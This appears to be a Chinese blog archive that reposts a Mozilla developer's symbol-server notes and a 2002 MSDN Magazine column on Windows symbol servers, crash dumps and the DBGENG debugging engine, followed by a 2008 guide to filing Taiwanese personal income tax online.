20080512

晚上9:32:00

Setting up a Symbol Server Sandbox

September 29, 2007 by Lukas Blakk

After today’s IRC chat with luser, I now have a list of things to do in order to acheive 0.1:

set up a localhost server
make buildsymbols from my own build
load those symbols onto the local server
connect them up to my debugger to make sure it all works
get the microsoft scripts to work adding source code to my local pdb files
so that the debugger can access the source code from being pointed to my server

Starting off, I set up IIS on my computer so that I can have a localhost webserver. This was a bit tricky with some unexpected authentication issues but I think that I have it working now. If I point my browser to http://localhost/symbolServer/ I have a directory of the pdb files that I created by calling make buildsymbols in my objdir.

The next move was to point my debugger (Visual Studio 2005) to the localhost symbol server. However, this is where I got stuck. I could load up the microsoft symbols but it would skip right over my firefox ones.

So I’m going back to square 1. I’m rebuilding with debug disabled because this may be a part of the issue. If this doesn’t work I need to look into either a) symbol server directory structure because maybe I’m missing something about the hierarchy or b) perhaps my IIS set-up authentication issues are preventing VStudio from accessing the symbols.

Of course, in the back of my head I know it could also be c) something else entirely.

Back to the building.

--------------------------------我是分隔線------------------------------------------------------------

From the June 2002 issue of MSDN Magazine.

Symbols and Crash Dumps

Download the code for this article: Bugslayer0206.exe (671KB)

don't know about you, but in my day job I'm bouncing back and forth so much between .NET and Win32® that my head is spinning. In this month's installment of Bugslayer, I want to discuss some very cool advances that Microsoft® has developed to make debugging your Win32-based applications easier. Anything you can do to stamp out those Win32 bugs faster means you can spend more time playing with your XML Web Services!
I'll start out this column by covering the hot new symbol server technology that will revolutionize how you deal with symbols and stack traces. After a tour of the symbol heaven, I'll discuss the new crash dump handling in Visual Studio® .NET as well as the new WinDBG so you can debug crashes after the fact just as if you were there. The last part of the column will be devoted to a utility that will quickly pull the important information out of crash dumps so you don't even have to open them in the debuggers!

Symbol Servers

Getting the correct symbols lined up between your application and the operating system is the secret to debugging faster. You know what happens when you don't get them coordinated; you get that beautiful call stack that has exactly one item in it. The reason symbols are so vital is that the Frame Pointer Omission (FPO) data is included as part of the PDB file. While you might think you have it tough messing with symbols, imagine how hard the Windows® operating system developers' lives must be. Whereas you have an application you might think is pretty big, the operating system developers have the largest commercial application in the world. I know people on the operating system team at Microsoft and I've asked if they get any help from the users debugging their applications. They all have laughed and told me that they get as much help with the operating system as I got when I was writing developer tools for a living. In other words, none.
Of course, they have many more versions of the operating system running at any given time than you could ever imagine. During a development cycle they might have anywhere up to 10,000 different builds running around the world. If you think you have trouble getting symbols to match, you have nothing on them!
Developers at Microsoft realized they had to do something to make life easier for themselves as well as their customers. Thus was born Symbol Servers. The concept is simple: store all the symbols for all public builds in a known location and make the debuggers smarter so they load the correct symbols without any user interaction. The beauty is that the reality is nearly that simple as well! There are a few small issues, which I'll point out in this column, but with the Symbol Server properly set up, you'll never want for symbols again.
The first step towards symbol nirvana is to download the latest version of WinDBG from http://www.microsoft.com/ddk/debugging as the Symbol Server binaries are developed by the WinDBG team. You will want to check back for updated versions of WinDBG, as the team seems to be on a fairly quick release schedule and are releasing updated versions every few months. After installing WinDBG, add the installation directory to the master PATH environment variable. The two key binaries, SYMSRV.DLL and SYMSTORE.EXE, must be accessible to read from and write to your Symbol Servers.

Figure 1 SYMSRV

The Symbol Store itself is simply a database that happens to use the file system to find the files. Figure 1 shows a partial listing from Explorer of the tree for the Symbol Server on one of my computers. The root directory is WebSymbols, and each symbol file, such as ADVAPI32.PDB, is listed at the first level. Under each symbol file name is a directory that corresponds to the date/time stamp, signature, and other information necessary to completely recognize a particular version of that symbol file. Keep in mind that if you have multiple versions of a file such as ADVAPI32.PDB for different operating system builds, you'll have multiple directories under ADVAPI32.PDB for each unique version you have accessed. In the signature directory, you'll probably have the particular symbol file for that version. There are provisions for having special text files to point to other locations in the Symbol Store, but by following my recommendation, you'll have the actual symbol files.
Actually creating your Symbol Server takes two excruciatingly difficult steps. First, create a folder on a server giving everyone in the development team read and write access and ensure that you have plenty of disk space available. Second, share that folder for all developers. You'll probably want the server and share name to be something like \SymbolsSymbols or something easily remembered.
The absolute beauty of the Symbol Server reveals itself when you populate it with operating system symbols. If you've been a good bugslayer over the years, you are probably already installing the operating system symbols on your machine. That's always been a little frustrating as you probably have a few hot fixes installed and certain operating system symbols never include the hot fix symbols. The great news with Symbol Servers is that you can be guaranteed of always getting the right operating system symbols with no work whatsoever! This is a huge boon.
The magic here is that Microsoft has made the symbols for all released operating systems, from Windows NT® 4.0 through the latest beta release of Windows Server 2003, including all operating system hot fixes, ready for download. To experience the magic, you need to set your _NT_SYMBOL_PATH environment variable to SRV*\SymbolsSymbols* http://msdl.microsoft.com/download/symbols. Please note that I am assuming that your symbol store will be on a server called \Symbols in a shared folder called Symbols. If yours are different, just substitute your values.
When you next start debugging, the debuggers will see that _NT_SYMBOL_PATH is set, automatically start downloading the operating symbols from Microsoft over HTTP, and put them in your Symbol Store if the symbol file has not already been downloaded. Remember, the Symbol Server will only download the symbols it needs, not every single operating system symbol. That's why putting the Symbol Store in a shared directory is so important; if one of your teammates has already downloaded the symbol, you avoid a potentially long download.
That takes care of the appropriate operating system symbols, so let's turn to getting your product symbols into the Symbol Server. SYMSTORE.EXE is a command-line utility that lets you add to your Symbol Store whole directory trees that contain symbols. SYMSTORE.EXE has a number of command-line switches (see Figure 2).
The best way to use SYMSTORE.EXE is to have it automatically add your complete build tree at the end of a daily build or milestone build. You probably do not want to have developers adding their local builds unless you are really into chewing up tons of disk space. For example, the following command will store all PDB and binary files in your symbol store for all directories found under D:BUILDRELEASE, inclusive:

symstore add /r /f d:buildrelease*.* /s \SymbolsSymbols /t "MyApp" /v "Build 632"

It's nice to have the binaries stored in your Symbol Store so your crash dumps can automatically line up the binaries, but you can eat up a lot of disk space doing that. If you only want to include the PDB files, you can use the following:

symstore add /r /f d:buildrelease*.PDB /s \SymbolsSymbols /t "MyApp" /v "Build 632"

There's lots more to read about SYMSTORE.EXE and Symbol Servers in the WinDBG documentation under Symbols; what I have discussed here are the steps that I have found to work well for me. I've been amazed how well the Symbol Server works and have been able to debug much faster because I nearly always have perfect call stacks.

Crash Dumps

What's really fantastic about Symbol Servers is that both WinDBG and Visual Studio .NET will use them if you are reading crash dumps as well. Just in case you are coming from one of those other operating systems, crash dumps are what Microsoft calls the user mode dump of the process when it crashes. Dr. Watson, the default debugger, writes crash dumps if you check the Create Crash Dump button shown in Figure 3. As you can guess, crash dumps are almost the next best thing to sitting there watching the application crash.

Figure 3 Create Crash Dump

As most folks realize, WinDBG has been able to read and process crash dumps for quite a while. What might be news though is that Visual Studio .NET can also handle crash dumps perfectly. That's great, because the UI of WinDBG takes minimalism to a new level.
Handling a crash dump is quite easy in Visual Studio .NET, but getting one opened is a little confusing. Start with a fresh instance of Visual Studio .NET and select Open Solution from the File menu. In the File Open dialog, select the fifth item down in the Files of Type combo box, Dump Files (*.dmp; *.mdmp). Navigate to the directory with your crash dump file and open it. That will create a new solution which you'll need to save. To start viewing the crash dump, simply press one of the debugging keys such as F5 (Go) or F10 (Step). You'll see the message box pop up reporting the error and, if you have all the appropriate symbols and source, you'll be dropped right on the line where you had the crash. It's that simple!
Both debuggers can write out crash dumps at any point during debugging. I do this frequently when tracking down tough problems so I can quickly look at the various stages I saw when debugging. This saves huge amounts of time.
Writing a dump from Visual Studio .NET is as simple as clicking on the Debug menu while debugging and selecting the last item on the menu, Save Dump As. Visual Studio .NET can write out two types of crash dumps. The minidump contains module information, such as name and date/time stamp, and the call stacks of all the threads. Minidumps are very small, on the order of 3-10KB. A minidump with heap, on the other hand, writes out the same information but also writes out all the memory marked as allocated memory. This way you can look at what pointer variables point to. Minidumps with heap are quite a bit larger; for simple "Hello World!" programs they're on the order of 2.5MB.
In WinDBG, creating crash dumps is done with the .dump command. One additional feature of WinDBG's crashes is that you also have all the handle data for the process stored in the crash dump with the .dump/mh command. With the !handle command you can then see the exact state of your handles right from the crash dump. This is invaluable for tracking down deadlocks.
You can even write out your own crash dumps at any time by calling the MiniDumpWriteDump API function from DBGHELP.DLL. Keep in mind that you must use the latest version of DBGHELP.DLL from the WinDBG installation in order for this function to work correctly. The only gotcha is that if you call MiniDumpWriteDump on yourself, your crash dump will start in the middle of MiniDumpWriteDump, which might mean you can't walk the stack back to your own code. Thus, BugslayerUtil.DLL contains a function called CreateCurrentProcessMiniDump that will properly wrap the call to MiniDumpWriteDump so you can get the best crash dumps possible just when you need them.

The Debugging Engine

While it's wonderful to have crash dumps, you always do the same thing when you load them up; you enumerate the threads so you can see where each one is. Since I am basically lazy, I wanted a tool that would just give me the information I always looked for so I didn't even have to start the debugger. I started poking through the docs looking for a way to read dump files and eventually ran across a mention that WinDBG is really a shell on top of a debugging engine. I figured if I could get the interface to that debugging engine, I could easily write a tool to dump the cool stuff. Hidden in the WinDBG installation is a node that says SDK, but is not set to install by default. I set it to "Will be installed on local hard drive" and got the header files and libraries for DBGENG.DLL, the debugger engine.

Figure 4 Setting Up the WinDBG SDK

If you look at Figure 4, which shows what you need to do to install the WinDBG SDK, you'll notice there's not an installation node for Documentation. What makes using DBGENG.DLL fun is that the only documentation is the comment section in the header file DBGENG.H. For the most part, the comments can get you going, but until there's full documentation, you are going to have to spend some time playing with parameters to figure out what some APIs expect (see Figure 5). Oddly, the interface appears like it's all COM-based. While it uses interfaces, it does not use OLE32.DLL at all. Think of the API as pseudo-COM. It's also pseudo-COM in the sense that you get all the pain of reference counting, but none of benefits of enumerators and the like.
Another issue with the interface is that it is essentially the internal interface to WinDBG. Some of the interfaces and methods return items in what is obviously internal WinDBG format. Additionally, the engine outputs lots of text messages that could make your application look just like the WinDBG Command window if you don't suppress it. All in all, the fact that there is a debugging engine more than makes up for the quirks in the interface. In Figure 5, I list only the most derived interfaces as it looks like the "2" interfaces are the latest and most complete. Since you can't call CoCreateXxx on the debugging engine interfaces, DBGENG.DLL exports two functions, DebugConnect and DebugCreate, to create the specific interfaces for you.
The best way to get started with the debugging engine is to compile and carefully step through the DUMPSTK sample included with the SDK installation. The only problem is that it doesn't work. DUMPSTK is supposed to dump the call stacks for a dump file. I nearly drove myself nuts wondering why the code did not work as expected.
The key method to get the debugging engine cranking is IDebugControl::WaitForEvent. Whenever DUMPSTK calls it, it always returns E_INVALIDARG. Since it only takes two unsigned longs, the flags to indicate what you are waiting on, such as the initial breakpoint, and the time to wait, I was completely confused. It slowly dawned on me that DBGENG.DLL was complaining that the image path and symbols path were not both set. I set the environment variable _NT_IMAGE_PATH, thinking it might get picked up, and all of a sudden IDebugControl::WaitForEvent started working. There's nothing like returning values that have no relationship at all to the actual error!
Once I got DUMPSTK limping along, it proved useful. It's small enough to get your head around but actually does something handy. Also, I recommend you spend some time reading the complete DBGENG.H header file. As you can see from the list in Figure 5, the information you might need to solve a problem with the debugging engine is scattered across multiple interfaces.
When I first started looking at the debugging engine, I could see all sorts of very cool debugging and analysis utilities that I would like to write when my commercial programs crash at the customer's site. The good news is that DBGENG.DLL is part of the Windows XP and Windows Server 2003 operating systems. To use it legally on Windows 2000, your customers must download the complete WinDBG package and install it on their machines.

The Crash Dump Information Dumper

Now that I've covered the debugging engine's interfaces, I want to describe the DMPINFO program I wrote. I have always wanted a program that could tell me the important information from a user mode crash dump. When I open a user mode crash dump in Visual Studio .NET and WinDBG, I always do the same operations, so I wanted to automate them. DMPINFO is also a much more complete sample on how to use the debugging engine's interfaces.
Using DMPINFO is trivial; just type DMPINFO in a command prompt followed by the user-mode crash dump file you want to dump. The DMPINFO outputs the system information from the user-mode crash dump, the loaded modules in the crash dump, the registers of the crashing thread, a disassembly for the crashing thread, and the call stack with all local variables. If you want to see all threads, pass -a on the command line. You can also pass in the specific source paths, symbols paths, and image paths. When looking at the DMPINFO output, you might notice that module symbol types are Document Interchange Architecture (DIA) even though you have PDB files. DBGENG.H defines the DIA symbol type and DIA appears to be the new symbol format for Visual Studio .NET. However, all PDB symbols are reported as DIA.
I wrote DMPINFO with release 4.00.0018.0 of DBGENG.DLL. There are two bugs in DBGENG.DLL that you might see from DMPINFO. The system information values don't look right and occasionally the locals are not displayed for a stack scope. If you are running a debug build of DMPINFO, you will see an assertion message box. For some reason, DBGENG.DLL stops calling the IDebugOutputCallbacks interface so DMPINFO can't display locals. I'll discuss this problem in more detail later.
It actually took me quite a while to write DMPINFO because I had to spend so much time in trial and error development. The documentation is not bad in DBGENG.H; it's just not complete. Consequently, I had to try passing different parameters in all the time to get the results I wanted. You will see more assertions in DMPINFO.CPP than in any program you have ever seen because I needed to know instantly when something failed.
The first issue I ran into was that the debugging engine spews quite a bit of output, which gets in the way. I set up my own interface, IBetterDebugOutputCallbacks, derived from IDebugOutputCallbacks, so that I could filter out the debugging engine output that I didn't want to see. You can see the work in OUTPUT.H and OUTPUT.CPP available from my downloadable source sample. Fortunately, the output all seems to occur when you load a crash dump, so I could just turn off output until I was finished getting everything loaded. Use the -v command line switch on DMPINFO's command line in order to see all output.
The next issue I ran into was that there does not seem to be a way to determine if loaded symbols are programmatically mismatched with the binary. The debugging engine will output the mismatch when you load the crash dump so that engine knows about the mismatch. I hope that Microsoft will add a method to IDebugSymbols or a new field to the DEBUG_MODULE_PARAMETERS structure so you can find the mismatches.
My goal for DMPINFO was to show how to do all the work without using some of the easy methods of some of the interfaces. That way you would have a stronger sample and would have an idea how to apply the techniques yourself. When it came time for me to do the disassembly part of DMPINFO, I have to admit I wimped out. It's impossible to disassemble backwards in IA32 assembly language because the instructions are variable length, so I was not looking forward to grinding through an algorithm to get everything lined up so I could show 15 instructions before the instruction pointer. The output from IDebugControl->OutputDisassemblyLines wasn't what I wanted because I couldn't stick in a little pointer prefix, which indicated the instruction pointer. The output is just a blob of text. OutputDisassemblyLines will do all the work to find the instruction starts in the disassembly and return them as an array. When I saw that OutputDisassemblyLines would do the work for me, I punted! I turned off output, called OutputDisassemblyLines so I could get the offsets of all the instructions starts, then called IDebugControl->Disassemble so I could format the lines as I wanted.
I spent what seemed like forever wrestling with the final part of DMPINFO: getting the local symbols. The first problem was that I could not figure out how to get the local symbols loaded after I set the scope. After calling IDebugSymbols->SetScope, I could see that I needed to call IDebugSymbols->GetScopeSymbolGroup. When I called IDebugSymbolGroup->GetNumberSymbols, I always got back that there were zero symbols. After nearly giving up, I finally asked Microsoft how to get local symbols. You have to pass the "*" string to IDebugSymbolGroup->AddSymbols to get the locals loaded into the IDebugSymbolsGroup. You can take a look at all of this in action in the OutputScopeSymbols function in DMPINFO.CPP.
Once I got the locals loaded, I thought I was on my way. That's when I ran into the biggest problem of the current IDebugSymbolGroup interface: there's no way to enumerate local symbols values! You can call IDebugSymbolGroup->GetSymbolName to get the name of a symbol index. What's missing are two methods, GetSymbolType and GetSymbolValue. You can get the type in a roundabout way by calling IDebugSymbolGroup->GetSymbolParameters to get the DEBUG_SYMBOL_PARAMETERS structure for a symbol. In there is a TypeId field which you can call IDebugSymbols->GetTypeName (notice it's a different interface). That's two thirds of the information, but it doesn't have the all-important value. I called IDebugSymbolGroup->OutputSymbols and that did output all the symbol information, but in this very strange format:

<name>**NAME**<value>**VALUE**<offset>**OFF**<type>**TYPE**

The debugging engine outputs all symbols in this format packed end-to-end in a giant string. I especially liked the fact that a common value "*" (think pointer) was used as a delimiter. Since there is no other way to get values, I had to trap the string and parse it up to show them. I certainly hope that future releases of the debugging engine will fix this oversight.

Wrap Up

Getting a Symbol Server set up is so important I urge you to stop reading right now and get one set up for your organization! It will make your debugging life so much easier. Also, armed with the new crash dump handling in Visual Studio .NET and WinDBG, getting rid of bugs should be even easier. Finally, I hope I was able to help you get over some of the same hurdles I ran into when I started with DBGENG.DLL. While it might have a few quirks, it's still a work in progress and will only get better with time. I encourage you to think about the possibilities and start creating some of those debugging tools you've always wanted!

Da Tips!

The sweet smell of flowers in the spring should help you think of even more tips. Send your tips to me at john@wintellect.com.
Tip 53 If you have any really tough debugging problems, the new WinDBG documentation has a couple of excellent discussions in the Debugging Techniques section.
Tip 54 John Maver reports a cool trick with the Visual Studio .NET debugger. If you have a line like this

HeapFree ( GetProcessHeap ( ) , 0 , lpdwPIDs ) ;

and if you want to step into HeapFree, but not GetProcessHeap, put your cursor on HeapFree, right-click, and choose Step Into HeapFree. The text changes based on where you place your cursor. I like this one so much I assigned the shortcut Ctrl-Alt-F11 to it.

Send questions and comments for John to slayer@microsoft.com.

John Robbins is a cofounder of Wintellect, a software consulting, education, and development firm that specializes in programming in .NET and Windows. He is the author of Debugging Applications (Microsoft Press, 2000) and the upcoming Debugging .NET and Win32 Applications also from Microsoft Press. You can contact John at http://www.wintellect.com.

20080509

上午9:03:00

[稅務] 網路報稅軟體下載與個人綜合所得稅申報解說
http://payoversea.com/money/

一 . 網路報稅軟體下載:

每年五月份是報稅的月份....
申報期間通常自5/1～5/31，記得不要逾期了喔！
今年是 97/05/01 ~ 97/06/02

△ 申報方式：網路申報、填表郵寄申報、親臨櫃檯。

△ 網路申報分兩種：(適合有電腦且可上網者)
1. GCA申報 (有GCA還可直接網路下載所得資料，但申請GCA時稍微麻煩一點)
2. 身分證+戶口名簿戶號

財政部電子申報軟體網路下載處：
http://tax.nat.gov.tw/irc/irc_download.html

這邊有網路安裝版和下載安裝版本兩種...

PS.
假如網路報稅軟體安裝後會有亂碼的話,
請依照習慣自行判斷下一步一直安裝下去就對了!

安裝完畢後, 請自行到此目錄, 找出該檔案,複製到桌面當捷徑就可以了.
C:Program FileseTaxIRXBinIrcWin.exe

△ 網路申報軟體的登入方式:
1. 自然人IC卡憑證
2. 金融憑證 (網路銀行憑證,網路下單憑證,網路保險憑證.)
3. 身份證字號 + 戶口名簿戶號

(以1,2種方式申報者,可以直接從網路上接收去年大部分的個人稅收資料,省去輸入的麻煩!)

△ 財政部審查通過的金融憑證:

金融憑證網路報稅聯合服務網站公告為準: http://itax.twca.com.tw/index.asp

(1) 新光金控、兆豐商銀、土地銀行、合作金庫銀行、彰化銀行、第一商銀
(2) 元大京華證券、日盛證券、元富證券、統一綜合證券、群益證券、富邦綜合證券、
玉山綜合證券、台証綜合證券、永豐金證券、兆豐證券、亞東證券、國票綜合證券
(3) 南山人壽

△ 繳稅繳款方式：
信用卡、現金、支票、ATM自動櫃員機轉帳、填寫繳稅取款委託書。

△ 退稅退款方式：
金融機構轉帳退稅、一般退稅憑單退稅。

二 . 個人所得稅申報相關規定:

△ 已婚家庭的申報選擇：夫妻分開申報、以夫為主、以妻為主的納稅申報。今年各項申報方式與往年並無太大的異動。

△ 不用報稅的情況：
不用報稅的情形請參閱下方附表所列,只適合不需退稅的情況，
(可退稅時, 若不申報則無法退稅...)

△ 個人免稅額：77,000元（年滿70歲：115,500元）

△ 一般扣除額：(標準與列舉二擇一)
a. 標準：46,000元 (夫妻合併申報：92,000元)
b. 列舉：捐贈、保險費、醫藥&生育費、災害損失、自用購屋貸款利息、房租。

△ 特別扣除額：
1.薪資所得：每人最高 78,000元
2.財產交易損失：以實際財產交易所得為上限
3.儲蓄投資：最高 270,000元
4.殘障：77,000元
5.高等教育學費：最高 25,000元

---------------

三 . 補充資料:
註明: 以下資料轉載自96年度綜合所得稅電子結算繳稅系統的說明檔案!

綜合所得稅網際網路結算申報說明

近年來由於個人電腦的普及化，使得在網路上漫遊成為人與人之間必備的資訊(知識)和便利，利用網際網路報稅也成為民眾報稅的管道之一，每年民眾到了申報期間，最受困擾之問題大概如下：

什麼人應該辦理綜合所得稅結算申報？

凡是個人全年綜合所得總額（包括本人、配偶及受扶養親屬之所得）不超過免稅額及標準扣除額之合計數（如下表）者，除有下列1、2的情形仍應辦理申報外，得免辦結算申報。所得總額中有薪資所得者，可再減除薪資所得特別扣除額；年滿70歲之納稅義務人本人、配偶及受扶養直系尊親屬者，可再減除其個人免稅額38,500元。
1、有扣繳稅款或可扣抵稅額依法可申請退稅者，應辦理申報才能退稅。
2、依所得基本稅額條例規定應辦理個人所得基本稅額申報者，應填寫「個人所得基本稅額申報表」併同一般申報書辦理申報。
受扶養親屬人數 0人 1人 2人 3人 4人 5人
免辦結算
申報標準無配偶 123,000元 200,000元 277,000元 354,000元 431,000元 508,000元
有配偶 246,000元 323,000元 400,000元 477,000元 554,000元 631,000元

執行業務者的所得核定較為複雜，如未辦理結算申報，經依照財政部頒布收入及費用標準核定其有執行業務所得，除補稅外，應依所得稅法第一百十條規定處罰，為保障您的合法權益，務請辦理結算申報。
什麼時間辦理申報？

從97年5月1日起至97年6月2日止（法定結算申報截止日5月31日適逢星期假日，展延至6月2日），都可申報，請儘早辦理，以免最後幾天的排隊擁擠。

向什麼地方辦理申報？

可就近至任一國稅局辦理；或利用郵寄以掛號逕寄戶籍所在地國稅局；或透過網際網路（http://tax.nat.gov.tw）辦理，但逾期申報者，僅得向戶籍所在地國稅局辦理。透過網際網路辦理申報有應檢附的其他證明文件、單據者，應於97年6月12日前逕送（寄）戶籍所在地國稅局或就近至任一國稅局所屬分局、稽徵所或服務處代收。

扶養親屬

扶養親屬資料維護。
什麼是免稅額？

年滿70歲 [民國26年（含該年）以前出生] 的本人、配偶及申報受扶養直系尊親屬，每人免稅額115,500元，其餘申報受扶養親屬及未滿70歲的本人、配偶，每人免稅額77,000元。民國96年結婚或離婚者，可選擇合併或分別申報；若屬分居狀態，無法合併申報者，仍應於申報書上填寫配偶的姓名及國民身分證統一編號，並註明”已分居”字樣。

　

什麼是受扶養親屬？

納稅義務人本人及配偶申報扶養的親屬，必須合於下列規定條件之一：

直系尊親屬年滿60歲者，或雖未滿60歲但沒有謀生能力，受納稅義務人扶養者（須檢附無謀生能力適當證明文件）。兄弟姊妹二人以上共同扶養直系尊親屬，應由兄弟姊妹間協議推定其中一人申報扶養，請勿重複申報。
子女未滿20歲者〔民國77年（含該年）以後出生者；縱有所得，亦不得單獨申報，但已婚者除外〕，或年滿20歲因在校就學、身心殘障、或無謀生能力，受納稅義務人扶養者（須附在學證明或醫師證明等）。76年出生者可選擇單獨申報或與扶養人合併申報。同胞兄弟姊妹未滿20歲者，或年滿20歲因在校就學、身心殘障、或無謀生能力，受納稅義務人扶養者（須檢附在學證明或醫師證明等）。
納稅義務人其他親屬或家屬（如伯、姪、孫、甥、舅等），合於民法第1114條第4款（家長家屬相互間）及第1123條第3項（雖非親屬而以永久共同生活為目的同居一家者，視為家屬）規定，未滿20歲或滿60歲以上無謀生能力（須另檢附醫師證明或其他適當證明文件），確係受納稅義務人扶養者。但受扶養者的父或母如屬現役軍人或托兒所、幼稚園、公私立國民中小學的教職員，不得列報減除（須另檢附受扶養者的父母親非屬前述免稅者的適當證明文件，註(1)）。申報扶養其他親屬或家屬時，須檢附下列證明文件，供稽徵機關審查：
(1)納稅義務人與以永久共同生活為目的同居一家的其他親屬或家屬，同一戶籍者：戶口名簿影本或身分證影本或其他適當證明文件。
(2)納稅義務人與以永久共同生活為目的同居一家的其他親屬或家屬，非同一戶籍者：受扶養者或其監護人註明確受納稅義務人扶養的切結書或其他適當證明文件。

註：

可檢附受扶養者父母服務機關掣發的在職證明或薪資所得的扣繳憑單或投保單位開立的全民健康保險的繳費收據或其他適當證明文件。
在學證明可利用當年度的繳費收據、學生證正反面影本、畢業證書影本或在學證明書，國外留學或就讀軍事學校可比照辦理。
納稅義務人的配偶或扶養親屬為無國民身分證的華僑或外國人者，其國民身分證統一編號欄請依居留證的統一證號欄項資料填註，若居留證無統一證號欄項或未領有居留證者，請填註西元出生年月日加英文姓名第1個字前兩個字母。（例：姓名Carol Lee，西元1978年10月24日出生，應填寫為：19781024CA）申報時應檢附足資證明親屬關係及確有扶養事實的文件，供稽徵機關核認。

所得資料

所得資料維護。
如何計算綜合所得淨額？

綜合所得總額減除免稅額及扣除額後之餘額即為綜合所得淨額。

什麼是綜合所得總額？
就是本人、配偶及申報受扶養親屬取得下列各類所得的合計：營利所得、執行業務所得、薪資所得、利息所得、租賃所得及權利金所得、自力耕作漁牧林礦所得、財產交易所得、競技競賽及機會中獎的獎金或給與、退職所得、其他所得等。

什麼是營利所得？
包括：

公司或合作社分配屬86年度或以前年度的股利或盈餘。（請依扣（免）繳憑單填寫）
公司或合作社分配屬87年度或以後年度股利總額或盈餘總額。（請依股利憑單填寫）
合夥事業的合夥人每年度應分配的盈餘總額或獨資資本主每年自獨資經營事業所得的盈餘總額。（請依營利事業投資人明細及分配盈餘表填寫，並檢附該已申報收件的營利事業投資人明細及分配盈餘表及已繳納營利事業所得稅稅款相關證明文件）
個人一時貿易的盈餘。
合於盈餘轉增資緩課規定（88年12月31日修正前促進產業升級條例第16條、第17條後段及獎勵投資條例第13條）的新發行記名股票於轉讓、贈與或作為遺產分配時的面額部分（或面額加計所含可扣抵稅額合計數），但實際轉讓價格低於面額時為轉讓價格（或轉讓價格加計所含可扣抵稅額合計數）。（請依緩課股票轉讓所得申報憑單填寫）
※股利所得中含有借入有價證券所分配的股利者：借券人於跨越除權除息基準日仍持有借入有價證券，其所領取股利如嗣後已返還出借人，該部分股利免計入借券人的綜合所得總額，所含可扣抵稅額亦不得抵繳借券人的應納稅額。借券人申報減除該部分股利時，請依有價證券借貸交易權益補償轉開專用憑單填寫。

什麼是執行業務所得？
律師、會計師、建築師、技師、醫師、藥師、助產士、著作人、經紀人、代書人、工匠和表演人及其他以技藝自力營生者的業務收入或演技收入，減去必要費用或成本後的餘額（請檢附收入明細表及損益表供稽徵機關審查。執行業務者如未依法辦理結算申報，或未依法設帳記載並保存憑證，或未能提供證明所得額的帳簿文據者，稽徵機關得依查得資料或財政部頒訂標準核定其所得額）。
個人取得稿費、版稅、樂譜、作曲、編劇、漫畫及講演的鐘點費收入，全年合計不超過18萬元者，得全數扣除，但超過限額者，就超過部分減除成本及必要費用後，以其餘額申報為執行業務所得。
什麼是薪資所得？
就是在職務上或工作上所取得的各種收入，包括薪金、俸給、工資、津貼、歲費、獎金、紅利、各種補助費和其他給與（如車馬費等）。

什麼是利息所得？
是指公債（包括各級政府所發行的債券、庫券、證券及憑券）、公司債、金融債券、各種短期票券、金融機構的存款（含公教軍警人員退休金優惠存款）及其他貸出款項所取得的利息，以及有儲蓄性質到期可還本的有獎儲蓄券中獎的獎金。個人持有公債、公司債、金融債券的利息所得，短期票券到期兌償金額超過首次發售價格部分的利息所得，及依金融資產證券化條例或不動產證券化條例規定分離課稅的受益證券或資產基礎證券分配的利息所得，不併計綜合所得總額，亦即免予填報，已扣繳的稅款，亦不得抵繳應納稅額或申報退稅。

什麼是租賃所得和權利金所得？
租賃所得
租賃所得是指下列收入，減去合理而必要的損耗和費用後的餘額：
財產出租的租金收入。
財產出典的典價經運用而產生的收入。
因設定定期的永佃權和地上權而取得的各種收入。
財產出租所收的押金或類似押金的款項，或財產出典而取得的典價，按照年息2.175％的利率計算租賃收入。
必要損耗及費用（如申報書附表一的折舊、修理費、地價稅、房屋稅、以出租財產為保險標的物所投保的保險費、向金融機構借款購屋而出租的利息等）可逐項舉證申報；如不逐項舉證申報，本年度規定的必要費用標準，為租金收入的43%，但出租土地的收入僅得扣除該地當年度繳納的地價稅，不得扣除43%必要的損耗和費用。
將財產無償借與他人供營業或執行業務者使用，應按照當地一般租金情況，計算租賃收入。
將財產無償借與本人、配偶及直系親屬以外的個人，且非供營業或執行業務者使用者，除能提出無償借用契約（須經雙方當事人以外的2人證明確係無償借用，並依公證法辦竣公證）供核外，應按照當地一般租金情況，計算租賃收入。
財產出租申報的租金顯較當地一般租金為低，稽徵機關得參照當地一般租金調整計算租賃收入。
申報租賃所得時所須填寫的房屋稅籍編號，請參見該屋的房屋稅繳款書「稅籍編號」抄填，如A01237654321。
權利金所得是指：
以專利權、商標權、著作權、秘密方法和各種特許權利，供他人使用而取得的權利金收入，減去合理而必要損耗及費用（應舉證）後的餘額。

什麼是自力耕作、漁、牧、林、礦所得？
就是以自已的勞力從事農業耕作、漁撈、畜牧、造林、採礦等所得到的各種收入，減去必要費用後的餘額。

什麼是財產交易所得？
是指財產及權利因買賣或交換而取得的所得，包括：

(1)出價取得的財產和權利：以交易時的成交價額，減去原來取得時的成本和一切改良費用後的餘額。
(2)繼承或贈與取得的財產和權利：以交易時的成交價額減去繼承時或受贈與時該項財產或權利的時價，和繼承後或受贈與後的一切改良費用後的餘額。

但出售土地、家庭日常使用的衣物、傢俱的交易所得，依法免稅。出售或交換房屋所得歸屬年度，以所有權移轉登記完成日期的年度為準；拍賣房屋以買受人領得執行法院所發給權利移轉證書日期所屬年度為準。

註：個人出售房地，其原始取得成本及出售價格的金額，如檢附私契及價款收付紀錄、法院拍賣拍定通知書或其他證明文件，經稽徵機關查核明確，惟因未劃分或僅劃分買進或賣出房地的各別價格者，應以房地買進總額及賣出總額的差價，按出售時的房屋評定現值占土地公告現值及房屋評定現值的比例計算房屋的財產交易所得。

什麼是競技競賽及機會中獎之獎金或給與？
就是參加各種競技比賽或各種機會中獎的獎金或給與，所支付的必要費用或成本准予減除。政府舉辦的獎券中獎獎金，如統一發票、公益彩券中獎獎金（粉紅色扣免繳憑單），僅須扣繳稅款，不併計綜合所得總額，亦即免予填報，已扣繳的稅款，亦不得抵繳應納稅額或申報退稅。

什麼是退職所得？
就是個人領取的退休金、資遣費、退職金、離職金、終身俸及非屬保險給付的養老金等所得，不包括領取歷年自薪資所得中自行繳付儲金的部分及其孳息。

什麼是其他所得？
上開第(二)至第(十)以外的所得，以其收入減去因取得此項收入而支付成本及必要費用（須檢附單據或證明文件）的餘額為所得額。但職工福利委員會發給的福利金，無成本及必要費用可供減除。

什麼是變動所得？
自力經營林業之所得（屬自力耕作所得），受僱從事遠洋漁業，於每次出海後一次分配（非按月支領者）之報酬（屬薪資所得）及耕地因出租人收回耕地或政府徵收而依平均地權條例第77條或第11條規定取得之地價補償（屬其他所得）。
個人非因執行職務而死亡，其遺族依法令或規定一次領取的撫卹金或死亡補償與退職所得合併計算後，超過定額免稅的部分（屬其他所得）。
以上各項變動所得，得僅以所得之半數填入各類所得總額欄，計算當年度所得。
